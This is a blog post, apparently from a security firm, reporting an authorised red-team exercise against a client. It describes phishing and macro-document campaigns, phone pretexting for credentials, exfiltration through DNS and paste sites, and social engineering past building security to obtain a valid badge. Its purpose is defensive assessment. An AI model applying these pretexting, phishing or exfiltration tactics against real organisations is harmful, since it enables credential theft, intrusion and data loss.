Avatar

So how did the team get on in our War Game exercise? 

In order to complete the War Game exercise (the setup for which can be found in part 1 and part 2 of this series), our Security Advisory Services team determined that the following attack scenarios would need to be simulated:

The plan

  • A broad target phishing exercise
  • Malicious attachment campaign
  • Phone phishing campaign
  • Data exfiltration
  • Internal scenarios (limited duration access to network by external actor/malicious insider)
  • Social engineering assessment

To execute the phishing elements of the exercise, the team performed three specific campaigns:

  • Campaign 1: An email-based attack, posing as a client employee directing users to a news site discussing a recent client announcement
  • Campaign 2: An email-based attack, posing as a client employee and containing a Word document
  • Campaign 3: A phone-based attack, posing as a client employee seeking to ‘elicit’ information

Execution

Campaign 1

The team sent emails from a spoofed internal address to approximately 500 employees, which directed them to a news site discussing a recent announcement regarding a contract (intriguing!).

What made this campaign interesting was the fact that the team did not actively include a link to the website concerned. Rather, the team included a supposed exchange between two fictional employees, Graham and Catherine (rather more convincing than Jane and John Doe), discussing the website, with the URL included in the email subject as “Fwd: “. This website did not require authentication but rather its purpose was to simulate a ‘watering hole’ style attack, which could have been used to host exploits and malware, and would then be activated on visits by the client’s employees.

Note: The intention of this campaign was to mimic an attack that had been successful previously. In the previous exercise, the team had utilised a weakness in the configuration of the filtering proxy to effectively resign otherwise self-signed certificates with the client’s internal CA. This proved to no longer be possible (albeit, due to manual filtering by the client) and instead a real wildcard certificate was acquired. This campaign was spotted by the client, as the previous misconfiguration of the SSL middlebox had been fixed however the client agreed to whitelist our new site to allow a representative sample of users to be collected.

As a result, the team recorded connections to the website from about half of the targets, as well as 75 email responses.

Campaign 2

The second email campaign was sent in similar fashion to another set of 500 users. The basic premise regarded an email which had a Microsoft Word document attached, which contained a malicious macro (deadly alliteration there). This macro called back to the team’s staging box to say that the file had been run, but did not compromise the system. This extra functionality would have been trivial to add.

Firstly, a proof of concept, fully working implant was created. This was sent through to a pre-agreed employee, which was the user assigned to the internal phase of the test. The insider then executed these payload-enabling macros. The first attempt failed with an authentication problem at the proxy. The second payload managed to authenticate to the proxy and perform two out of the three required actions to gain a foot hold on the system; however, the team was unable to get an interactive shell back to the C&C server. The reason why this failed is a mystery, but the client should investigate to see which of the controls that are in place prevented the attack.

The second stage was to send a benign Word document with macro attached to collect statistics about the users who would open and run the macro.

In all, approximately 20% ran the macro. This means that an attacker would have received a relatively substantial number of implants deployed on the network. This is a serious failing and could have led to a complete compromise of the internal network.

All the case of both these email-delivered attacks, we included dummy command and control components, which, if accessed, could in principle have been leveraged to gain remote access to the users’ systems. The team did not follow up with this final action in any instance, but it is clearly the case that in both campaigns, that it would have been possible.

Campaign 3

In addition, the team also performed a short phone-based campaign. For this, a list of 500 names of employees and their corresponding extensions were supplied by the Client and split by the Team to account for each of the scenarios. These were:

  • Direct ask for credentials, pretending to be part of an internal team working on the new integration project playing off the back of the recent news
  • Direct ask for credentials. Same as above, but pretending to have information which is wrong, rather than just asking
  • Website direction, pretending to be a member of the Human Resources team wanting to collect data through a beta system for a ‘safety at work’ programme. The website asked for credentials

The stats for this were as follows:

  • Phone numbers called: 20
  • Phones answered: 5%
  • Direct password request: User ID given 1% (password never given)
  • Link followed: 2.5%; details entered: 1%

From an external point of view, this is the phishing that caused the most of a stir. After about an hour, the people who were calling seemed to know that this was going on; and they were much more apprehensive. The team did find out that the client intranet had a code that could be used to authenticate colleagues. Once it was realised that this existed, the team immediately started to ask for this to see if anyone would hand it over.

It appeared as though there were two types of users, those who did not know what the team talked about (so would not give it over) and those who knew what it was and would not give it over, as they knew they were not supposed to. During the campaign, there were a number of users who the team enticed into an email exchange, and from there got them to follow links.

There were also a number of users who said that they were reporting the call immediately. The team tried to turn this around, saying this was part of a phishing awareness campaign, and that they had done the right thing but ‘could they visit this site and register that they had passed the test’. Nobody fell for this extension (well done!).

Exfiltration

In order to identify whether adequate security controls were in place in terms of restricting the egress of data from the client networks, the team identified and evaluated the efficacy of several types of data exfiltration.

Whilst in the previous assessment, DNS tunnelling was found to be an effective method of surreptitious exfiltration, some steps had been taken to reduce the feasibility of this avenue. External DNS systems were not accessible directly, but instead were queried by perimeter DNS servers within the client network. By repeatedly querying the DNS entries for unique subdomains of an attacker-controlled domain, some data could still be exfiltrated through these DNS servers to external name servers, although this approach is not particularly efficient or reliable.

As a malicious insider, it would have been necessary to download, install and run various tools on the attacking client laptop/desktop, as well as potentially develop purpose-built tools, which would have required a significant level of technical expertise.

The team decided that transmitting data via HTTP or HTTPS would be simpler and a more likely scenario. The previous assessment showed that dynamic DNS providers could be utilised in order to reach attacker-controlled systems through the client’s proxies, but since then, the common examples (DynDns, No-IP) were found to be blocked. However, other dynamic DNS providers (especially paid ones) were found not to be blocked, and were not reactively blocked after a day or two of use. These could again be used to exfiltrate data.

Instead of setting up their own server as an exfiltration target, the team focused on public file-sharing sites. A number of sites were found not to be blocked, and could be used to exfiltrate data. The Team generated large quantities of false records as test data, which would appear to contain credit card numbers (with valid Luhn check digit), dates, names, sort codes and bank account numbers. These records were then exfiltrated in a series of activities of escalating brazenness. On the final day of the test, large record documents were uploaded in plain text to file-sharing sites and paste sites (for example, Pastebin) with no indication that they were detected. In the course of the assessment, the only detected instance was when the team attempted to exfiltrate a plain text CSV via email, which was blocked.

In order to identify whether the perimeter proxy could be bypassed, the team sent a number of packets across the network with their IP address marked as an external server. The aim was to identify any unusual traffic types which might be permitted to travel outside of the network perimeter. Packets of each IPv4 protocol (for example, 0 to 255), each ICMP type and code (0 to 255 each), all UDP ports, and TCP SYN packets of all ports were sent across the network. There was no indication that any of these packets reached the external server, which likely means that the network did not allow for traffic to “leak” onto the Internet, without first passing through the perimeter proxy and/or firewall.

Since multiple avenues exist for exfiltration, and some of these avenues were shown to require little technical skill and no special tools, it would not be particularly difficult for a malicious staff member on a standard client laptop (as provided to the team) to collect, combine (for example, ZIP), and exfiltrate significant amounts of sensitive data over a short period of time, without detection. This threat model could be extended to an unauthenticated malicious insider (for example, someone trespassing in the building), in which phishing is used to first gain another user’s Active Directory credentials to be used on the proxy.

The team carried out actions to simulate both threat actors, activities such as using non-client laptops to access network services (for example, scanning for vulnerable services, or attempting to access shares present on the NAS).

As a result, it became apparent that such activities were rapidly detected by the Blue Team (the only time when they scored points); however, low noise attacks went largely undetected.

The team had greater success when acting as a malicious insider. It was a simple task to elevate privileges to that of a local administrator in order to use this as a pivot point (for example, to simulate a fully compromised remotely accessible system). It took several days for the fully weaponised system’s activities to be discovered, by which time, it was possible for the team to gain remote code execution on a critical server within the client’s network.

Additionally, a sample of servers that comprised the critical systems were examined for common vulnerabilities, and in almost all instances, patches were identified as being missing that could result in a Denial of Service to the systems or full system compromise. Furthermore, it was also identified that software was insecurely installed, which could also result in the compromise of critical systems.

Social engineering

In order to carry out an effective assessment of the two sites operated by the client as part of the War Game exercise, the team attempted to answer the following questions:

  • Could the team gain unauthorised access to either site?
  • Could the team leverage attacks from one site to another?

After testing, the Team confirmed that all sites could be accessed unauthenticated and trust levels between sites actually helped attackers gain access.

Below is a diarised (digitally, of course) version of the attack that took place over two days after in-depth reconnaissance:

  • The team arrived at Site A at 9 am and approached reception staff and asked for a “new starter form”. This was provided by reception staff with no questions or verification. The team left the building, filled out the form and proceeded to the rear of the building.
  • At the back of the building, the loading bay is in constant use and is more often open than closed. The team proceeded to enter the loading bay and therefore into the building. Upon first contact, the team asked to be directed to the ID card production office and was shown by security staff to the correct room and informed that someone would be there soon. The team was left alone in the card production room for approximately five minutes with full access to cards and lanyards; the security staff appeared and the team produced the new starter form and offered ID, but this was turned down as apparently the form was enough. Security staff were concerned that the form was only for one week, as this is below the minimum threshold; however, the team then convinced security staff that they were actually going to need the pass renewed often for six months. Security staff then offered to make a badge valid for six months and also included access to Site B. No verification was required and the team left with a valid photo ID badge that worked across Site A and Site B. Had the Team requested it, a pass would have been validated for any site.
  • The team was then able to access all areas of Site A except the data center floors. This might have been possible with tailgating techniques, had more footfall traffic been available during the assessment time.
  • As well as the above, the team was able to freely move around the building and at one point even joined in a large IT security meeting, without challenge. In addition to this, the team was informed that access to floor four was restricted, but simple tailgating techniques gave the team access to the executive areas on that floor.
  • The team turned up at the site perimeter entrance and used the buzzer/intercom to contact security. No words were exchanged to either verify the team member or the reason for the visit. Security staff remotely opened the gate and the team was allowed onto the site. The team then used the badge from the site A compromise to open the front reception entrance. Upon entry, security did not ask for ID or request the visitor book was signed.
  • The team told the security guard that they were meeting people but gave no details as to who. The team was then allowed to sit in the canteen area on the ground floor.
  • During this time, the team was able to enter two separate rooms on the ground floor; one appeared to be a generic build room containing computer systems and infrastructure devices, the other appeared to be a security guard room. This room’s door was wedged open. The build room door had access control, but the Site A obtained badge worked on this door.
  • Despite security being suspicious, they did not request ID or attempt to verify with external staff the reason for the visit. After some time, the lone security staff member walked outside the building and the team was left alone in the building. The team then used their Site A pass on the doors leading to the data floors. Once inside, several entrances were discovered; one utilised a badge/code mantrap entrance, which appeared to be well-secured, whilst one door was protected only by passive RFID locks (albeit of a type not previously seen elsewhere on the customer’s site). However, these were installed incorrectly and could have easily been bypassed, had the team been authorised to do so (therefore allowing the team onto the data floor). The Team then proceeded up onto the upper floor, which was mostly empty and had lights off; however, after some time, the team was able to locate a small data rack that contained an access switch. The team could have inserted network-compromising devices into this system at this point.
  • Having no authorisation to bypass the passive RFID locks on the data floor entrances by means of a physical attack (and wanting to avoid attracting attention), the team decided that no further actions could be taken within the site to prove further compromise and proceeded to hand themselves into security. Upon handing themselves into security, the security staff failed again to verify any of the staff listed on the letter of authority, or use internal phone systems to contact them, but instead used the mobile numbers provided (these could potentially have been fake numbers, as part of a more sophisticated attack group).

Conclusion

The team believes that the likelihood of a successful Internet delivered attack by either a malicious insider or via an external actor is high, given the systemic failures identified in these scenarios. It should, however, be noted, that the attacker would have to employ extremely stealthy techniques in order to avoid detection by the client team and would require fairly extensive knowledge of client systems and software deployments.

Similarly, the team felt that by leveraging multiple failures between both sites, unrestricted and authorised access to any area in any client site would be possible. Had this been a more aggressive attack, there is no doubt that access to the data racks and computer systems held within Site B would have been fully compromised.

The final part of this series deals with the post-War Game wash down and touches on some of the recommendations the team made to the client, both for end users and perhaps more importantly for the blue team who had been trying to stop us.

 



Authors

Tim (Wadhwa-)Brown

Security Research Lead

CX Technology & Transformation Group